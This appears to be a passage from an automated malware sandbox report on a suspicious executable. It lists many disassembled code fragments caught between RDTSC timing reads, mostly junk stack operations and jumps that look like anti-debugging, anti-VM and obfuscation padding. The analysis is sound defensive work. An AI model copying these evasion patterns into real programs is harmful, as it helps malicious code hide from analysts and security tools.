Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F0AD11 second address: F0AD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16C743A4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB16C743A56h 0x00000010 push edx 0x00000011 jmp 00007FB16C743A4Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F0AE9A second address: F0AEA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F0AEA0 second address: F0AEA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F0B177 second address: F0B193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FB16D3ACA52h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F0B193 second address: F0B198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F0B331 second address: F0B336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F18D9F second address: F18DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F179A7 second address: F179B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FB16D3ACA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F179B1 second address: F179BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F17AF4 second address: F17AFE instructions: 0x00000000 rdtsc 0x00000002 js 00007FB16D3ACA46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F17AFE second address: F17B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB16C743A56h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F17B1A second address: F17B1F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F17B1F second address: F17B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F17B2D second address: F17B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FB16D3ACA59h 0x0000000b jmp 00007FB16D3ACA55h 0x00000010 jnp 00007FB16D3ACA46h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F17B68 second address: F17B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F17B6D second address: F17B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F17E1B second address: F17E21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F17E21 second address: F17E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F185AB second address: F185B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F185B1 second address: F185B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F185B7 second address: F185D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16C743A59h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F18C5B second address: F18C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F1E369 second address: F1E37A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FB16C743A4Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F1FF54 second address: F1FFA1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB16D3ACA4Ch 0x00000008 jo 00007FB16D3ACA52h 0x0000000e jng 00007FB16D3ACA46h 0x00000014 je 00007FB16D3ACA46h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 pushad 0x00000022 popad 0x00000023 push esi 0x00000024 pop esi 0x00000025 popad 0x00000026 pushad 0x00000027 jmp 00007FB16D3ACA54h 0x0000002c jmp 00007FB16D3ACA4Bh 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F23304 second address: F2330A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F2330A second address: F23316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB16D3ACA46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F23316 second address: F2331A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E6A522 second address: E6A526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E6A526 second address: E6A52C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E6A52C second address: E6A532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E6A532 second address: E6A557 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c jmp 00007FB16C743A57h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E6A557 second address: E6A55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F2CD39 second address: F2CD3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F2CEB6 second address: F2CEBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F2CEBC second address: F2CEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB16C743A52h 0x0000000c push eax 0x0000000d pop eax 0x0000000e jl 00007FB16C743A46h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F2CEDE second address: F2CEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16D3ACA51h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F2CEF5 second address: F2CEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F2FDA6 second address: F2FDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16D3ACA57h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F2FDC2 second address: F2FDD0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jo 00007FB16C743A52h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F2FDD0 second address: F2FDD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F2FDD6 second address: F2FDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F3AFDF second address: F3B002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB16D3ACA46h 0x0000000a popad 0x0000000b push ebx 0x0000000c je 00007FB16D3ACA46h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 pushad 0x00000016 jmp 00007FB16D3ACA4Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F4AC25 second address: F4AC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F4AD5C second address: F4AD6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB16D3ACA46h 0x0000000a jno 00007FB16D3ACA46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F4AEC6 second address: F4AEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16C743A4Fh 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F4B2ED second address: F4B2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F4B2F7 second address: F4B310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB16C743A46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FB16C743A4Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F4B4B0 second address: F4B4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F4B4B8 second address: F4B4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007FB16C743A46h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jno 00007FB16C743A46h 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F4B4D5 second address: F4B4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F4B4D9 second address: F4B4F9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB16C743A46h 0x00000008 jmp 00007FB16C743A52h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F4B4F9 second address: F4B4FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F4B658 second address: F4B680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16C743A4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB16C743A51h 0x0000000e jnc 00007FB16C743A46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E68BA7 second address: E68BB3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB16D3ACA4Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F51C7D second address: F51C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FB16C743A46h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F51C8D second address: F51CB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB16D3ACA57h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jns 00007FB16D3ACA46h 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F51CB7 second address: F51CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16C743A4Eh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F5194D second address: F51951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F51951 second address: F51957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F51957 second address: F51972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FB16D3ACA5Ah 0x0000000c jmp 00007FB16D3ACA4Ah 0x00000011 push eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F62EDE second address: F62F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB16C743A46h 0x0000000a popad 0x0000000b pop esi 0x0000000c pushad 0x0000000d push edi 0x0000000e jng 00007FB16C743A46h 0x00000014 pop edi 0x00000015 jmp 00007FB16C743A4Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jng 00007FB16C743A46h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F5C6B2 second address: F5C6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007FB16D3ACA4Ch 0x0000000b ja 00007FB16D3ACA46h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F5C6C3 second address: F5C6C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F5C6C8 second address: F5C6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 jg 00007FB16D3ACA59h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F5C6EF second address: F5C6F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F708A5 second address: F708BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB16D3ACA46h 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007FB16D3ACA46h 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F708BA second address: F708C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F708C0 second address: F708C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F708C4 second address: F708E3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB16C743A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007FB16C743A46h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F708E3 second address: F708E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E5498C second address: E54996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB16C743A46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F7071F second address: F70738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FB16D3ACA52h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F70738 second address: F70753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16C743A55h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F70753 second address: F7075D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F7075D second address: F70761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8B64E second address: F8B656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8B8B6 second address: F8B8CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB16C743A50h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8B8CC second address: F8B8D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8B8D2 second address: F8B8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8B8D6 second address: F8B8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8B8DA second address: F8B8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8B8E0 second address: F8B8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FB16D3ACA48h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 jc 00007FB16D3ACA4Eh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8BBF6 second address: F8BC16 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB16C743A4Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FB16C743A48h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8BD64 second address: F8BD69 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8BD69 second address: F8BD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8BD75 second address: F8BD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8BD79 second address: F8BD7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8C1A6 second address: F8C1B0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB16D3ACA52h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8C1B0 second address: F8C1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F8DAE4 second address: F8DAEE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB16D3ACA46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F9058A second address: F905A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FB16C743A4Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F90626 second address: F906B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FB16D3ACA48h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov dl, al 0x00000026 push 00000004h 0x00000028 mov edx, dword ptr [ebp+12482BF9h] 0x0000002e sub dx, BF37h 0x00000033 call 00007FB16D3ACA49h 0x00000038 jne 00007FB16D3ACA63h 0x0000003e push eax 0x0000003f je 00007FB16D3ACA4Ah 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 pop edx 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d push ecx 0x0000004e jmp 00007FB16D3ACA52h 0x00000053 pop ecx 0x00000054 mov eax, dword ptr [eax] 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push ebx 0x0000005a pop ebx 0x0000005b pop eax 0x0000005c rdtsc
